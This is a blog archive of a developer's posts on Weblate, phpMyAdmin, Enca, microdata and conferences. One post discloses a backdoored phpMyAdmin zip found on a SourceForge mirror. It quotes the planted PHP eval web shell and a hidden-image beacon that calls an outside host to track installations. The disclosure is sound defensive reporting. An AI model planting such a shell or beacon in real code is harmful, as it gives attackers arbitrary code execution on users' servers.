Michal Čihař - Blog Archives for English

Playing with HTML microdata

Since Google introduced support for "Rich snippets", I wanted to play with that technology a bit. I've already used microformats in the past, but today's preferred solution seems to be microdata, which plays nicely with HTML 5.

To have some real data to show, I've chosen spolecneaktivity.cz, a community site for free time activities (sorry it is Czech only). It provides me XML export of some data to play with.

After a little bit of hacking, I wrote a Python script to parse that and output HTML with all microdata details I've found in original XML. The output now lives at http://cihar.com/aktivity/ and Google's Structured Data Testing Tool seems to parse this just fine.

The only question is whether it will show up in the results sometimes as it warns "urls are pointing to a different domain than the base url".

Weblate 1.3 on l10n.cihar.com

As Weblate release is getting closer, I've decided to give new version more testing in real life and it got deployed at http://l10n.cihar.com/.

This release brings quite a lot of new features, most interesting for users might be:

  • Better and new consistency checking.
  • Better support for Android resources.
  • More visible data exports.
  • New buttons to enter some special characters.
  • Support for exporting dictionary.
  • Checks for source strings and support for source strings review.
  • Support for user comments for both translations and source strings.
  • Better changes log tracking.
  • Changes can now be monitored using RSS.

You can see full list of changes in our documentation.

As usual, I hope this upgrade will go smoothly and won't cause any big problems :-).

RSS feeds and feature freeze of Weblate 1.3

Yesterday I've completed last big feature I wanted to have for Weblate 1.3 - improved changes tracking and exporting this as RSS feed.

You can find example of this feature on data exports page on demo server, it is also covered in the documentation. I think there is not much to describe here, these are simple RSS feeds which will contain all important things happening to translation.

This being last major feature, we're now aiming at stabilization and bug fixes. I expect this phase will take two weeks where I plan to deploy new version to http://l10n.cihar.com/ (probably next week).

If you can help with testing, you're welcome to help and report bugs.

Weblate brings source strings checks and review

Weblate 1.3 will bring several new features. One of recently implemented parts is source strings review.

Translators quite often find some problems with original string. Be it typo, wrong wording or simply the message is hard to understand. In Weblate 1.3 they will have an option to push feedback to developers. The feedback is stored within Weblate and optionally can be sent to configured email.

In addition to this, there are now checks for source strings as well, which might help you to improve quality of them. New checks are of course covered in the documentation.

You can already try current Weblate on http://demo.weblate.org/, though there are still some things which need polishing.

oSC12 wrap up

As the openSUSE Conference and all related events are over, it's time to share my thoughts how it was.

This was actually first conference ever where I helped with organizing, so it was quite new experience for me. Week before it has happened I expected quite a lot of problems, but in the end everything went more or less smoothly.

Having something like 700-800 visitors is IMHO great for first year of LinuxDays, even though it has been collocated with other conferences. Most people came on Saturday and there were less of them on Sunday. Maybe it was result of the party, which lasted for many of them till early morning (I've left around 1 AM and there were still lot of people drinking).

Besides organizing stuff, I also had my own talk about Weblate. Unfortunately not much people has attended it, but those who did gave me some valuable feedback which will be reflected in next Weblate release. Anyway if you want to see my slides from this talk, they are now available on my website.

New phpMyAdmin theme

Today, I've finally found time to process new themes for phpMyAdmin. Result of this are two theme releases.

First one was just a minor update to older theme (Darkblue/orange 2.11), which fixed behavior in Internet Exporer.

Second one was completely new theme for phpMyAdmin 3.5 - blueorange (I admit the name is not too creative). This is actually first contributed theme compatible with 3.5 series.

Of course you can find all of these on our themes page.

Bootstrapping awesome in Prague this weekend

This weekend there is going to be a lot happening in Prague - awesome combination of four conferences will happen here.

I'm sure this will be really a great event with lot of interesting things on schedule. Even if you are not interested in technical stuff, future media track might be interesting for you. And of course the event includes huge party on Saturday evening (and welcome party with pre-registration on Friday)/

Anyway if you will be around, you can meet me somewhere there, usually within organizers crew.

PS: There also nice summary of latest news available now.

Think twice before making your private data public

Data, once put on the internet, are quite hard to delete. You can most likely delete (or ask for deleting) them from place where it has been originally distributed, but you can be never sure where else it has appeared.

Recently, I've seen several requests to remove some data from Gammu testsuite. This testsuite was created using public data available in our bug tracker, simply to be able to verify that we won't break stuff which was earlier fixed.

It turns out that some people did make public some very private stuff, which was included in the testsuite in the end. None of the developers had clue about content of these messages, being in language which nobody of us understands (and being too lazy to run them through Google translator to understand them).

Of course we've removed the data on request, but it's probably already copied in dozen other places on the internet...

Compromised SourceForge mirror

Yesterday, phpMyAdmin security team has been notified about backdoor being distributed together with phpMyAdmin zip file on one of SourceForge mirrors.

We quickly analyzed the issue and confirmed that the backdoor is indeed present in phpMyAdmin-3.5.2.2-all-languages.zip file. It allowed anybody to execute arbitrary PHP code, there was file called server_sync.php which simply called eval on passed data:

<?php @eval($_POST['c']);?>

In addition to this, javascript code has been included, which could allow attacker to track vulnerable installations:

var icon ;
icon = document.createElement("img");
icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg";
icon.width=0;
icon.height=0;
document.body.appendChild(icon);

All in all looks like simple, but quite effective way to install backdoor, if they would be able to spread this more widely. We've immediately released PMASA-2012-5 to notify our users.

Luckily this was spot quite fast (looking at used domain, the exploit could not be alive before 22th September 2012) and not on much frequent mirror (based on SourceForge official statement about 400 users have downloaded the file with backdoor).

What still remains unclear is whether this was really only targeted on phpMyAdmin, or there were more modified file on this mirror (SourceForge hosts thousands of projects). I've randomly tried few our other download options from this mirror and none of them was affected, but the mirror was taken offline before I could do some more systematic analysis, so this question can now be answered only by SourceForge.

Enca 1.14

Seems I've forgotten to announce Enca 1.13 here, but I won't do the same mistake with 1.14, which has been released today.

If you don't know Enca, it is an Extremely Naive Charset Analyser. It detects character set and encoding of text files and can also convert them to other encodings using either a built-in converter or external libraries and tools like libiconv, librecode, or cstocs. It's code is currently available at Gitorious.

The full changes for 1.14 release are short:

  • Allow standard names for belarusian and slovenian languages, thanks to Branislav Geržo for suggestion.
  • Reset strictness when check buffer less than file size, thanks to Sam Liao.
  • Fixed typos in man page, thanks to A. Costa.

Still enca is in maintenance mode only and I have no intentions to write new features. However there is no limitation to other contributors :-).

You can download from http://cihar.com/software/enca/.